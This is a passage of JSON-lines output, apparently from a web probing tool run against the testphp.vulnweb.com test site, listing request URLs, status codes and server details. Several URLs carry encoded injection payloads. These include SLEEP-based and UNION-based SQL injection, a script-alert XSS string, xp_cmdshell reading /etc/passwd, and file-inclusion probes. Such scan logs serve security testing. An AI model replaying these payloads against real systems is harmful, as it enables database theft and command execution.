02:22:37.52429128Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29WQkT%29%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29WQkT%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29WQkT%29%23\",\"time\":\"363.554934ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:37.807174819Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3BSELECT%20SLEEP%285%29%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3BSELECT%20SLEEP%285%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10%3BSELECT%20SLEEP%285%29%23\",\"time\":\"356.854833ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.532960204Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10\\u0026mjqN=3421%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10\\u0026mjqN=3421%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3D10\\u0026mjqN=3421%20AND%201%3D1%20UNION%20ALL%20SELECT%201%2CNULL%2C%27%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%27%2Ctable_name%20FROM%20information_schema.tables%20WHERE%202%3E1--%2F%2A%2A%2F%3B%20EXEC%20xp_cmdshell%28%27cat%20..%2F..%2F..%2Fetc%2Fpasswd%27%29%23\",\"time\":\"341.529418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.564895894Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10\",\"time\":\"345.96237ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.595235009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10CONFIRMED\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=-1%20OR%2017-7%3d10CONFIRMED\",\"time\":\"340.779008ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":16,\"lines\":4,\"status_code\":200,\"content_length\":181,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.652810925Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=1\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=1\",\"time\":\"345.29098ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.657286918Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=4727\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=4727\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=4727\",\"time\":\"349.531161ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":2,\"lines\":2,\"status_code\":200,\"content_length\":47,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.742413148Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%283302%3D3302%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29x%29%29\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/details.php?id=EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%283302%3D3302%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29x%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/details.php?id=EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176627671%2C%28SELECT%20%28ELT%283302%3D3302%2C1%29%29%29%2C0x716a627a71%2C0x78%29%29x%29%29\",\"time\":\"347.795273ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":17,\"lines\":2,\"status_code\":200,\"content_length\":319,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.904341102Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/\",\"title\":\"Index of /Mod_Rewrite_Shop/images/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/\",\"time\":\"350.081539ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":198,\"lines\":10,\"status_code\":200,\"content_length\":513,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:38.992830129Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/1.jpg\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/1.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/1.jpg\",\"time\":\"348.488959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":21,\"lines\":29,\"status_code\":200,\"content_length\":3551,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.074962696Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/2\",\"time\":\"351.445854ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.091799684Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2.jpg\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/2.jpg\",\"time\":\"352.361457ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":20,\"lines\":17,\"status_code\":200,\"content_length\":2739,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.142932645Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2M\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/2M\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/2M\",\"time\":\"344.354386ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.207752548Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/3.jpg\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/3.jpg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"image/jpeg\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/3.jpg\",\"time\":\"343.069796ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":18,\"lines\":28,\"status_code\":200,\"content_length\":3560,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.384415608Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/A01\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/images/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/images/A01\",\"time\":\"354.503274ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.447760969Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/index.php\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/index.php\",\"time\":\"349.669539ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":45,\"lines\":4,\"status_code\":200,\"content_length\":975,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.459113577Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/rate.php?id=-\",\"time\":\"353.421289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":137,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.506141801Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10\",\"time\":\"352.081809ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":12,\"lines\":2,\"status_code\":200,\"content_length\":100,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:39.678883321Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10CONFIRMED\",\"input\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10CONFIRMED\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Mod_Rewrite_Shop/rate.php?id=-1%20OR%2017-7%3d10CONFIRMED\",\"time\":\"349.061992ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":137,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:42.942226027Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Nginx\",\"input\":\"http://testphp.vulnweb.com/Nginx\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Nginx\",\"time\":\"339.11362ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:43.052796531Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/\",\"input\":\"http://testphp.vulnweb.com/Templates/\",\"title\":\"Index of /Templates/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/\",\"time\":\"346.30043ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":46,\"lines\":8,\"status_code\":200,\"content_length\":289,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:43.137174177Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/A01\",\"input\":\"http://testphp.vulnweb.com/Templates/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/A01\",\"time\":\"361.04862ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:43.178113799Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/high\",\"input\":\"http://testphp.vulnweb.com/Templates/high\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/high\",\"time\":\"351.441641ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:43.540941628Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/mai\",\"input\":\"http://testphp.vulnweb.com/Templates/mai\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/mai\",\"time\":\"346.333362ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:43.905063269Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.d\",\"input\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.d\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/main_dynamic_template.d\",\"time\":\"354.059373ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:43.907857128Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt\",\"input\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/main_dynamic_template.dwt\",\"time\":\"357.421246ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:44.170116142Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php\",\"input\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php\",\"title\":\"Document titleg\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/main_dynamic_template.dwt.php\",\"time\":\"353.098864ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":480,\"lines\":105,\"status_code\":200,\"content_length\":4697,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:44.660886601Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.phpA01\",\"input\":\"http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Templates/main_dynamic_template.dwt.phpA01\",\"time\":\"352.572844ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:44.791298467Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Total\",\"input\":\"http://testphp.vulnweb.com/Total\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Total\",\"time\":\"356.821598ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:47.870453482Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"input\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"title\":\"Index of /_mmServerScripts/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/_mmServerScripts/\",\"time\":\"343.357649ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":122,\"lines\":9,\"status_code\":200,\"content_length\":400,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:47.879770204Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/User-Agent:\",\"input\":\"http://testphp.vulnweb.com/User-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/User-Agent:\",\"time\":\"351.81968ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:48.170276222Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php\",\"input\":\"http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/_mmServerScripts/MMHTTPDB.php\",\"time\":\"356.630302ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":4,\"lines\":1,\"status_code\":200,\"content_length\":93,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:48.892525331Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts/mysql.php\",\"input\":\"http://testphp.vulnweb.com/_mmServerScripts/mysql.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/_mmServerScripts/mysql.php\",\"time\":\"357.296468ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":200,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:48.923848072Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/acunetix_file\",\"input\":\"http://testphp.vulnweb.com/acunetix_file\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file\",\"time\":\"356.191746ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:48.94173479Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/acunetix_file///////$1$PrWp.Xbx$q4QDCqdxYE6NcMph53jie0\",\"input\":\"http://testphp.vulnweb.com/acunetix_file///////$1$PrWp.Xbx$q4QDCqdxYE6NcMph53jie0\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file///////$1$PrWp.Xbx$q4QDCqdxYE6NcMph53jie0\",\"time\":\"343.667773ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:48.996942293Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test\",\"input\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/acunetix_file_inclusion_test\",\"time\":\"340.674658ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:49.008854581Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test?,0,NULL,active\",\"input\":\"http://testphp.vulnweb.com/acunetix_file_inclusion_test?,0,NULL,active\",\"title\":\"404 Not 